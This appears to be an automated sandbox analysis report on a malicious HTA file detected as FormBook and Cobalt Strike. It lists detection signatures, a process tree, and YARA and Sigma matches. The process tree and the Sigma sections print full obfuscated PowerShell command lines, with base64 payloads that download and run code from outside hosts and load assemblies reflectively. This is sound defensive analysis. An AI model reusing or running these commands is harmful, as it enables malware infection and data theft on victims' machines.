Edit tour

Windows Analysis Report
createdbetterthingswithgreatnressgivenmebackwithnice.hta

Overview

General Information

Sample name:	createdbetterthingswithgreatnressgivenmebackwithnice.hta
Analysis ID:	1576454
MD5:	a6970349fa549932767b924de6e7952b
SHA1:	c780e03f22ebf6b2418b210dddd22472e7b003e9
SHA256:	15f451bcfbbaf0532eb4c29a2651b10f68c40cef82d308efbb52fd1a20d85318
Tags:	htauser-lontze7
Infos:

Detection

Cobalt Strike, FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Cobalt Strike Beacon

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected obfuscated html page

AI detected suspicious sample

Connects to a pastebin service (likely for C&C)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected Generic Downloader

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: AspNetCompiler Execution

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 5844 cmdline: mshta.exe "C:\Users\user\Desktop\createdbetterthingswithgreatnressgivenmebackwithnice.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 3500 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7092 cmdline: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 6348 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 6648 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD327.tmp" "c:\Users\user\AppData\Local\Temp\zl2mzrqp\CSC28505E0AE9E8489AA3B119DACC3AAED2.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 2928 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 6084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_compiler.exe (PID: 3924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
createdbetterthingswithgreatnressgivenmebackwithnice.hta	JoeSecurity_Obshtml	Yara detected obfuscated html page	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2534332351.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.2535434593.0000000000B90000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2b950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13c4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: powershell.exe PID: 6084	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 6084	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x389e:$b2: ::FromBase64String( 0x260b1:$b2: ::FromBase64String( 0x26120:$b2: ::FromBase64String( 0x314e6:$b2: ::FromBase64String( 0x31b7d:$b2: ::FromBase64String( 0x471a31:$b2: ::FromBase64String( 0xa1dd4f:$b2: ::FromBase64String( 0xa1e3f3:$b2: ::FromBase64String( 0xa1f2ac:$b2: ::FromBase64String( 0xa20164:$b2: ::FromBase64String( 0xa20811:$b2: ::FromBase64String( 0xa474e6:$b2: ::FromBase64String( 0xa47e29:$b2: ::FromBase64String( 0xa484cd:$b2: ::FromBase64String( 0xd77a58:$b2: ::FromBase64String( 0xd780fc:$b2: ::FromBase64String( 0xd7932e:$b2: ::FromBase64String( 0xe35240:$b2: ::FromBase64String( 0xe75297:$b2: ::FromBase64String( 0xe7eb53:$b2: ::FromBase64String( 0x36c8:$b3: ::UTF8.GetString(
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
11.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2dc43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x15f42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
11.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
11.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ea43:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
7.2.powershell.exe.537e4c8.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_6084.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_6084.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZXN0dGhpbmdzd2l0aGVuZXJneWxldmVsZ29vZGZvcmJ1c2luZXNzcHVyb3BzZS50SUYiLCIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIiwwLDApO3N0QVJULXNsRWVQKDMpO0luVm9rRS1leFByRXNzaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRoZW5lcmd5bGV2ZWxnb29kZm9yYnVzaW5lc3MudmJTIg=='+[chaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithenergylevelgoodforbusiness.vbS" , ProcessId: 2928, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwerShell -EX BypasS -NoP -w 1 -c DevICEcrEdenTiaLdeplOymENT.exe ; invoke-exPRessIoN($(invOke-EXprESsIoN('[sYSTeM.TEXt.eNCodiNG]'+[CHAr]0X3a+[ChaR]58+'utf8.GetStrIng([sysTeM.cONveRT]'+[CHAR]0X3A+[CHAR]0x3A+'FRombaSe64sTRinG('+[CHAr]0x22+'JFkydXEzSjNpbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1iZXJkZUZpbkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxtT24uZGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxam9VQkhYYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga2JNZWFlcXosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJLdlZrWGZVckZuLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVkR5RXpmdnMsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVpYXFNRlpBVWlEKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJsU0siICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWTJ1cTNKM2lsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMjMzL2NyZWF0ZWRiZ